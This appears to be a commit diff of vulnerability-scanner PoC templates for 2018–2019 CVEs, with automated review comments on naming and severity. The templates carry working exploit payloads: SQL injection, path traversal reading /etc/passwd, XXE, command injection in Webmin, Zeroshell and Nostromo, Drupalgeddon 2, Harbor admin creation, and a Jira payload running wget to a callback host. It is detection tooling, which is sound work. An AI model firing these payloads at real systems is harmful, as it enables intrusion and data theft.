    20 17   body: id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{rand}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+
    21  - follow_redirects: false
    22 18   expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) && response.body.bcontains(b"dataexists")
    23 19  expression: r0()
    24 20   
    skipped 1 lines
    afrog-pocs/cve/2018/dedecms-cve-2018-6910.yml afrog-pocs/CVE/2018/CVE-2018-6910.yaml
    1  -id: dedecms-cve-2018-6910
     1 +id: CVE-2018-6910
    2 2   
    3 3  info:
    4 4   name: dedecms-cve-2018-6910
    skipped 2 lines
    7 7   reference:
    8 8   - https://nvd.nist.gov/vuln/detail/cve-2018-6910
    9 9   
    10  -manual: true
    11  -transport: http
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /include/downmix.inc.php
    18 15   expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
    skipped 2 lines
    afrog-pocs/unreviewed/joomla-cve-2018-7314-sql.yml afrog-pocs/CVE/2018/CVE-2018-7314.yaml
    1  -id: joomla-cve-2018-7314-sql
     1 +id: CVE-2018-7314
    2 2   
    3 3  info:
    4  - name: joomla-cve-2018-7314-sql
     4 + name: Joomla SQL Inject
    5 5   author: 南方有梦(http://github.com/hackgov)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X
    18 15   expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
    skipped 3 lines
    afrog-pocs/unreviewed/uwsgi-cve-2018-7490.yml afrog-pocs/CVE/2018/CVE-2018-7490.yaml
    1  -id: uwsgi-cve-2018-7490
     1 +id: CVE-2018-7490
    2 2   
    3 3  info:
    4  - name: uwsgi-cve-2018-7490
    5  - author:
     4 + name: uWSGI PHP Plugin Directory Traversal
     5 + author: unkown
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    18 14  expression: r0()
    19 15   
    afrog-pocs/unreviewed/drupal-cve-2018-7600-rce.yml afrog-pocs/CVE/2018/CVE-2018-7600.yaml
    1  -id: drupal-cve-2018-7600-rce
     1 +id: CVE-2018-7600
    2 2   
    3 3  info:
    4  - name: drupal-cve-2018-7600-rce
    5  - author:
     4 + name: Drupal Drupalgeddon 2 RCE
     5 + author: unkown
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomLowercase(4)
    12 10   r2: randomLowercase(4)
    13 11  rules:
    14 12   drupal70:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}
    19 16   headers:
    skipped 6 lines
    26 23   build_id: search["build_id"]
    27 24   drupal71:
    28 25   request:
    29  - cache: true
    30 26   method: POST
    31 27   path: /?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}
    32 28   headers:
    skipped 3 lines
    36 32   expression: response.body.bcontains(bytes(r1 + "%" + r2))
    37 33   drupal80:
    38 34   request:
    39  - cache: true
    40 35   method: POST
    41 36   path: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
    42 37   headers:
    skipped 7 lines
    afrog-pocs/unreviewed/couchcms-cve-2018-7662.yml afrog-pocs/CVE/2018/CVE-2018-7662.yaml
    1  -id: couchcms-cve-2018-7662
     1 +id: CVE-2018-7662
    2 2   
    3 3  info:
    4  - name: couchcms-cve-2018-7662
     4 + name: Couchcms 2.0 Dictionary Disclosure
    5 5   author: we1x4n(https://we1x4n.github.io/)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /includes/mysql2i/mysql2i.func.php
    16  - follow_redirects: false
    17 13   expression: 'response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")'
    18 14   r1:
    19 15   request:
    20  - cache: true
    21 16   method: GET
    22 17   path: /addons/phpmailer/phpmailer.php
    23  - follow_redirects: false
    24 18   expression: 'response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")'
    25 19  expression: r0() && r1()
    26 20   
    skipped 1 lines
    afrog-pocs/unreviewed/dedecms-cve-2018-7700-rce.yml afrog-pocs/CVE/2018/CVE-2018-7700.yaml
    1  -id: dedecms-cve-2018-7700-rce
     1 +id: CVE-2018-7700
    2 2   
    3 3  info:
    4  - name: dedecms-cve-2018-7700-rce
     4 + name: Dedecms V5.7 后台任意代码执行
    5 5   author: harris2015(https://github.com/harris2015)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomInt(2000000000, 2100000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field}
    18 15   follow_redirects: true
    skipped 3 lines
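Review bot: The new `name` describes this as 后台 (admin-panel) code execution, yet the request sends `token=` empty and no session cookie, so on a real deployment the rule only fires where the admin area is reachable without authentication; state that precondition in `info.description`, and for consistency with the rest of this commit use an English name such as `DedeCMS V5.7 Authenticated Code Execution`. In the `partcode` payload, `echo md5{{r}};` has no call parentheses, so PHP would evaluate an undefined constant rather than hash the number; check that the `expression` in the skipped lines matches what the page actually emits, or change the payload to `echo md5({{r}});`.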
    afrog-pocs/cve/2018/CVE-2018-8033.yml afrog-pocs/CVE/2018/CVE-2018-8033.yaml
    skipped 4 lines
    5 5   author: pikpikcu
    6 6   severity: high
    7 7   description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
    8  - tags: cve,cve2018,apache,ofbiz,xxe
    9  - classification:
    10  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    11  - cvss-score: 7.50
    12  - cve-id: CVE-2018-8033
    13  - cwe-id: CWE-200
    14 8   reference:
    15 9   - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2018-8033
    16 11   
    17  -manual: true
    18  -transport: http
    19 12  rules:
    20 13   r0:
    21 14   request:
    22  - cache: true
    23 15   method: POST
    24 16   path: /webtools/control/xmlrpc
    25 17   headers:
    26 18   Content-Type: application/xml
    27 19   body: <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
    28  - follow_redirects: false
    29 20   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    30 21  expression: r0()
    31 22   
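--- a/afrog-pocs/unreviewed/razor-cve-2018-8770.yml
+++ b/afrog-pocs/CVE/2018/CVE-2018-8770.yaml
@@ -1,19 +1,15 @@
-id: razor-cve-2018-8770
+id: CVE-2018-8770
  
 info:
- name: razor-cve-2018-8770
+ name: Cobub Razor 0.8.0 Physical path Leakage Vulnerability
  author: we1x4n(https://we1x4n.github.io/)
- severity: high
+ severity: medium
  
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /tests/generate.php
- follow_redirects: false
  expression: 'response.status == 200 && response.body.bcontains(b"Fatal error: Class ''PHPUnit_Framework_TestCase'' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line")'
 expression: r0()
  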
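Review bot: Dropping `follow_redirects: false` from the r0 request changes what `response.status == 200` can match if the runner's default is to follow redirects: a request answered with a 30x to a login page would then be evaluated against that page's 200. Here the body checks on the PHPUnit fatal-error text keep the rule from matching by accident, so the risk is low, but if the key was removed because the new template format no longer accepts it, a sentence in the commit description saying so would help readers of the other renamed PoCs. The same removal appears in CVE-2019-12725, CVE-2019-19781, CVE-2019-19985 and CVE-2019-9670 in this commit.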
    afrog-pocs/unreviewed/dvr-cve-2018-9995.yml afrog-pocs/CVE/2018/CVE-2018-9995.yaml
    1  -id: dvr-cve-2018-9995
     1 +id: CVE-2018-9995
    2 2   
    3 3  info:
    4  - name: dvr-cve-2018-9995
     4 + name: DVR Authentication Bypass
    5 5   author: cc_ci(https://github.com/cc8ci)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /device.rsp?opt=user&cmd=list
    16 13   headers:
    skipped 5 lines
    afrog-pocs/cve/2019/solr-cve-2019-0193.yml afrog-pocs/CVE/2019/CVE-2019-0193.yaml
    1  -id: solr-cve-2019-0193
     1 +id: CVE-2019-0193
    2 2   
    3 3  info:
    4  - name: solr-cve-2019-0193
     4 + name: Apache Solr Remote Code Execution
    5 5   author: fnmsd(https://github.com/fnmsd)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /solr/admin/cores?wt=json
    19  - follow_redirects: false
    20 16   expression: response.status == 200 && response.body.bcontains(b"responseHeader")
    21 17   output:
    22 18   search: '"\"name\":\"(?P<core>.*?)\"".bsubmatch(response.body)'
    23 19   core: search["core"]
    24 20   r1:
    25 21   request:
    26  - cache: true
    27 22   method: POST
    28 23   path: /solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}%2B{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E
    29 24   headers:
    skipped 4 lines
    34 29   <book>
    35 30   </book>
    36 31   </books>
    37  - follow_redirects: false
    38 32   expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
    39 33  expression: r0() && r1()
    40 34   
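Review bot: `severity: high` is kept for an unauthenticated remote code execution rule while sibling RCE entries in this commit (CVE-2019-15107, CVE-2019-16278, CVE-2019-7238) are raised to `critical`; unless the lower rating is deliberate, `severity: critical` would be consistent. The same applies to CVE-2019-12725 and CVE-2019-16663, which also stay at `high`. No `reference` list was added here either, although several renamed files in this commit gained an NVD link; `- https://nvd.nist.gov/vuln/detail/CVE-2019-0193` under a `reference:` key would follow that pattern. Part of the r1 request (the headers and the start of the body) is collapsed in this section, so its expression was reviewed only as far as visible.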
  • afrog-pocs/cve/2019/CVE-2019-10758.yml afrog-pocs/CVE/2019/CVE-2019-10758.yaml
    Content is identical
    afrog-pocs/unreviewed/pulse-cve-2019-11510.yml afrog-pocs/CVE/2019/CVE-2019-11510.yaml
    1  -id: pulse-cve-2019-11510
     1 +id: CVE-2019-11510
    2 2   
    3 3  info:
    4  - name: pulse-cve-2019-11510
     4 + name: Pulse Connect Secure SSL VPN Arbitrary File Read
    5 5   author: leezp
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    18 14  expression: r0()
    19 15   
    skipped 1 lines
    afrog-pocs/cve/2019/jira-cve-2019-11581.yml afrog-pocs/CVE/2019/CVE-2019-11581.yaml
    1  -id: jira-cve-2019-11581
     1 +id: CVE-2019-11581
    2 2   
    3 3  info:
    4  - name: jira-cve-2019-11581
     4 + name: Jira 未授权服务端模板注入
    5 5   author: harris2015(https://github.com/harris2015)
    6 6   severity: critical
     7 + reference:
     8 + - https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw
    7 9   
    8  -manual: true
    9  -transport: http
    10 10  set:
    11 11   reverse: newReverse()
    12 12   reverseUrl: reverse.url
    13 13  rules:
    14 14   r0:
    15 15   request:
    16  - cache: true
    17 16   method: GET
    18 17   path: /secure/ContactAdministrators!default.jspa
    19  - follow_redirects: false
    20 18   expression: response.status == 200
    21 19   output:
    22 20   search: '"name=\"atlassian-token\" content=\"(?P<token>.+?)\"".bsubmatch(response.body)'
    23 21   token: search["token"]
    24 22   r1:
    25 23   request:
    26  - cache: true
    27 24   method: POST
    28 25   path: /secure/ContactAdministrators.jspa
    29 26   body: from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
    30  - follow_redirects: false
    31 27   expression: response.status == 302 && reverse.wait(5)
    32 28  expression: r0() && r1()
    33 29   
    skipped 1 lines
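--- a/afrog-pocs/unreviewed/zeroshell-cve-2019-12725-rce.yml
+++ b/afrog-pocs/CVE/2019/CVE-2019-12725.yaml
@@ -1,22 +1,18 @@
-id: zeroshell-cve-2019-12725-rce
+id: CVE-2019-12725
  
 info:
- name: zeroshell-cve-2019-12725-rce
+ name: Zeroshell 3.9.0 Remote Command Execution
  author: YekkoY
  severity: high
  
-manual: true
-transport: http
 set:
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(800000000, 1000000000)
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20{{r1}}%20-%20{{r2}}%0A%27
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
 expression: r0()
  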
    afrog-pocs/unreviewed/webmin-cve-2019-15107-rce.yml afrog-pocs/CVE/2019/CVE-2019-15107.yaml
    1  -id: webmin-cve-2019-15107-rce
     1 +id: CVE-2019-15107
    2 2   
    3 3  info:
    4  - name: webmin-cve-2019-15107-rce
     4 + name: Webmin <= 1.920 Unauthenticated Remote Command Execution
    5 5   author: danta
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    skipped 1 lines
    14 12  rules:
    15 13   r0:
    16 14   request:
    17  - cache: true
    18 15   method: POST
    19 16   path: /password_change.cgi
    20 17   headers:
    21 18   Referer: '{{url}}'
    22 19   body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2
    23  - follow_redirects: false
    24 20   expression: response.body.bcontains(bytes(string(r1 + r2)))
    25 21  expression: r0()
    26 22   
    afrog-pocs/unreviewed/harbor-cve-2019-16097.yml afrog-pocs/CVE/2019/CVE-2019-16097.yaml
    1  -id: harbor-cve-2019-16097
     1 +id: CVE-2019-16097
    2 2   
    3 3  info:
    4  - name: harbor-cve-2019-16097
     4 + name: Harbor Enables Privilege Escalation From Zero to admin
    5 5   author: scanf & Soveless(https://github.com/Soveless) & cc_ci(https://github.com/cc8ci)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(5, 10)
    12 10   r2: randomLowercase(r1)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /
    19 16   expression: response.body.bcontains(b"Harbor")
    20 17   r1:
    21 18   request:
    22  - cache: true
    23 19   method: POST
    24 20   path: /api/users
    25 21   headers:
    26 22   Content-Type: application/json
    27 23   body: '{"username": "{{r2}}", "has_admin_role": true, "password": "{{r2}}", "email": "{{r2}}@example.com", "realname": "{{r2}}"}'
    28  - follow_redirects: false
    29 24   expression: response.status == 201
    30 25  expression: r0() && r1()
    31 26   
    skipped 1 lines
    afrog-pocs/unreviewed/nhttpd-cve-2019-16278.yml afrog-pocs/CVE/2019/CVE-2019-16278.yaml
    1  -id: nhttpd-cve-2019-16278
     1 +id: CVE-2019-16278
    2 2   
    3 3  info:
    4  - name: nhttpd-cve-2019-16278
     4 + name: Nostromo 1.9.6 - Remote Code Execution
    5 5   author: Loneyer
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
    19 16   body: |
    skipped 6 lines
    afrog-pocs/unreviewed/ifw8-router-cve-2019-16313.yml afrog-pocs/CVE/2019/CVE-2019-16313.yaml
    1  -id: ifw8-router-cve-2019-16313
     1 +id: CVE-2019-16313
    2 2   
    3 3  info:
    4  - name: ifw8-router-cve-2019-16313
     4 + name: ifw8 Router ROM v4.31 Credential Discovery
    5 5   author: cc_ci(https://github.com/cc8ci)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /index.htm?PAGE=web
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.body.bcontains(b"www.ifw8.cn")
    18 14   r1:
    19 15   request:
    20  - cache: true
    21 16   method: GET
    22 17   path: /action/usermanager.htm
    23  - follow_redirects: false
    24 18   expression: response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body)
    25 19  expression: r0() && r1()
    26 20   
    skipped 1 lines
    afrog-pocs/unreviewed/rconfig-cve-2019-16663.yml afrog-pocs/CVE/2019/CVE-2019-16663.yaml
    1  -id: rconfig-cve-2019-16663
     1 +id: CVE-2019-16663
    2 2   
    3 3  info:
    4  - name: rconfig-cve-2019-16663
     4 + name: rConfig v3.9.2 RCE
    5 5   author: 17bdw
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomInt(800000000, 1000000000)
    12 10   r1: randomInt(800000000, 1000000000)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23
    19 16   expression: response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
    skipped 2 lines
    afrog-pocs/unreviewed/vbulletin-cve-2019-16759-bypass.yml afrog-pocs/CVE/2019/CVE-2019-16759.yaml
    1  -id: vbulletin-cve-2019-16759-bypass
     1 +id: CVE-2019-16759
    2 2   
    3 3  info:
    4  - name: vbulletin-cve-2019-16759-bypass
     4 + name: vBulletin v5.0.0-v5.5.4 Remote Command Execution
    5 5   author: Loneyer
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   f1: randomInt(800000000, 900000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /ajax/render/widget_tabbedcontainer_tab_panel
    18 15   headers:
    skipped 6 lines
    afrog-pocs/cve/2019/dlink-cve-2019-16920-rce.yml afrog-pocs/CVE/2019/CVE-2019-16920.yaml
    1  -id: dlink-cve-2019-16920-rce
     1 +id: CVE-2019-16920
    2 2   
    3 3  info:
    4  - name: dlink-cve-2019-16920-rce
     4 + name: D-Link Unauthenticated remote code
    5 5   author: JingLing(https://hackfun.org/)
    6 6   severity: critical
    7 7   description: fofa app="D_Link-Router"
     8 + reference:
     9 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16920
    8 10  
    9  -manual: true
    10  -transport: http
    11 11  set:
    12 12   reverse: newReverse()
    13 13   reverseURL: reverse.url
    14 14  rules:
    15 15   r0:
    16 16   request:
    17  - cache: true
    18 17   method: POST
    19 18   path: /apply_sec.cgi
    20 19   headers:
    skipped 7 lines
    afrog-pocs/unreviewed/metinfo-cve-2019-16996-sqli.yml afrog-pocs/CVE/2019/CVE-2019-16996.yaml
    1  -id: metinfo-cve-2019-16996-sqli
     1 +id: CVE-2019-16996
    2 2   
    3 3  info:
    4  - name: metinfo-cve-2019-16996-sqli
     4 + name: Metinfo 7.0.0beta SQL Inject
    5 5   author: JingLing(https://hackfun.org/)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23
    19 16   follow_redirects: true
    skipped 4 lines
    afrog-pocs/unreviewed/metinfo-cve-2019-16997-sqli.yml afrog-pocs/CVE/2019/CVE-2019-16997.yaml
    1  -id: metinfo-cve-2019-16997-sqli
     1 +id: CVE-2019-16997
    2 2   
    3 3  info:
    4  - name: metinfo-cve-2019-16997-sqli
     4 + name: Metinfo sql inject
    5 5   author: JingLing(https://hackfun.org/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /admin/?n=language&c=language_general&a=doExportPack
    19 16   headers:
    skipped 7 lines
    afrog-pocs/unreviewed/metinfo-cve-2019-17418-sqli.yml afrog-pocs/CVE/2019/CVE-2019-17418.yaml
    1  -id: metinfo-cve-2019-17418-sqli
     1 +id: CVE-2019-17418
    2 2   
    3 3  info:
    4  - name: metinfo-cve-2019-17418-sqli
     4 + name: Metinfo sql inject
    5 5   author: JingLing(https://hackfun.org/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin
    19 16   follow_redirects: true
    skipped 4 lines
    afrog-pocs/cve/2019/dlink-cve-2019-17506.yml afrog-pocs/CVE/2019/CVE-2019-17506.yaml
    1  -id: dlink-cve-2019-17506
     1 +id: CVE-2019-17506
    2 2   
    3 3  info:
    4  - name: dlink-cve-2019-17506
     4 + name: D-Link authentication
    5 5   author: l1nk3r,Huasir(https://github.com/dahua966/)
    6 6   severity: critical
     7 + reference:
     8 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17506
    7 9   
    8  -manual: true
    9  -transport: http
    10 10  rules:
    11 11   r0:
    12 12   request:
    13  - cache: true
    14 13   method: POST
    15 14   path: /getcfg.php
    16 15   headers:
    17 16   Content-Type: application/x-www-form-urlencoded
    18 17   body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
    19  - follow_redirects: false
    20 18   expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
    21 19  expression: r0()
    22 20   
    skipped 1 lines
    afrog-pocs/unreviewed/openfire-cve-2019-18394-ssrf.yml afrog-pocs/CVE/2019/CVE-2019-18394.yaml
    1  -id: openfire-cve-2019-18394-ssrf
     1 +id: CVE-2019-18394
    2 2   
    3 3  info:
    4  - name: openfire-cve-2019-18394-ssrf
     4 + name: Openfire Full Read SSRF
    5 5   author: su(https://suzzz112113.github.io/#blog)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /getFavicon?host=baidu.com/?
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com"))
    18 14  expression: r0()
    19 15   
    skipped 1 lines
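--- a/afrog-pocs/cve/2019/citrix-cve-2019-19781-path-traversal.yml
+++ b/afrog-pocs/CVE/2019/CVE-2019-19781.yaml
@@ -1,19 +1,17 @@
-id: citrix-cve-2019-19781-path-traversal
+id: CVE-2019-19781
  
 info:
- name: citrix-cve-2019-19781-path-traversal
+ name: Citrix Application Delivery Controller (ADC) and Gateway Directory Traversal.
  author: su(https://suzzz112113.github.io/#blog)
  severity: critical
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-19781
  
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /vpn/../vpns/cfg/smb.conf
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
 expression: r0()
  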
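Review bot: The new `name` ends with a trailing period (`... Directory Traversal.`), which none of the other renamed entries in this commit use; `name: Citrix Application Delivery Controller (ADC) and Gateway Directory Traversal` matches their style. The `path: /vpn/../vpns/cfg/smb.conf` value only reaches the vulnerable handler if the HTTP client sends the `..` segment as written; if that is a known requirement of the runner, a YAML comment above the line such as `# the dot segment must be sent unnormalized` would save maintainers from "fixing" it.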
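--- a/afrog-pocs/unreviewed/wordpress-cve-2019-19985-infoleak.yml
+++ b/afrog-pocs/CVE/2019/CVE-2019-19985.yaml
@@ -1,19 +1,15 @@
-id: wordpress-cve-2019-19985-infoleak
+id: CVE-2019-19985
  
 info:
- name: wordpress-cve-2019-19985-infoleak
+ name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
  author: bufsnake(https://github.com/bufsnake)
- severity: high
+ severity: medium
  
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /wp-admin/admin.php?page=download_report&report=users&status=all
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"]))
 expression: r0()
  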
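Review bot: The expression indexes `response.headers["Content-Disposition"]` unconditionally; if the runner exposes headers as a CEL map, a response without that header turns the lookup into an evaluation error rather than `false`, so the rule could report a failure instead of a clean miss. Because the body check on `Name,Email,Status,Created` comes first and `&&` short-circuits on false, this only affects responses whose body already matches, but guarding the lookup, e.g. `("Content-Disposition" in response.headers) && "(?i)filename=.*?.csv".bmatches(...)`, would make the miss explicit. Whether afrog's headers object supports `in` is not visible here and should be checked against the runner.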
    afrog-pocs/unreviewed/tvt-nvms-1000-file-read-cve-2019-20085.yml afrog-pocs/CVE/2019/CVE-2019-20085.yaml
    1  -id: tvt-nvms-1000-file-read-cve-2019-20085
     1 +id: CVE-2019-20085
    2 2   
    3 3  info:
    4  - name: tvt-nvms-1000-file-read-cve-2019-20085
     4 + name: TVT NVMS 1000 - Directory Traversal
    5 5   author: fuzz7j(https://github.com/fuzz7j)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
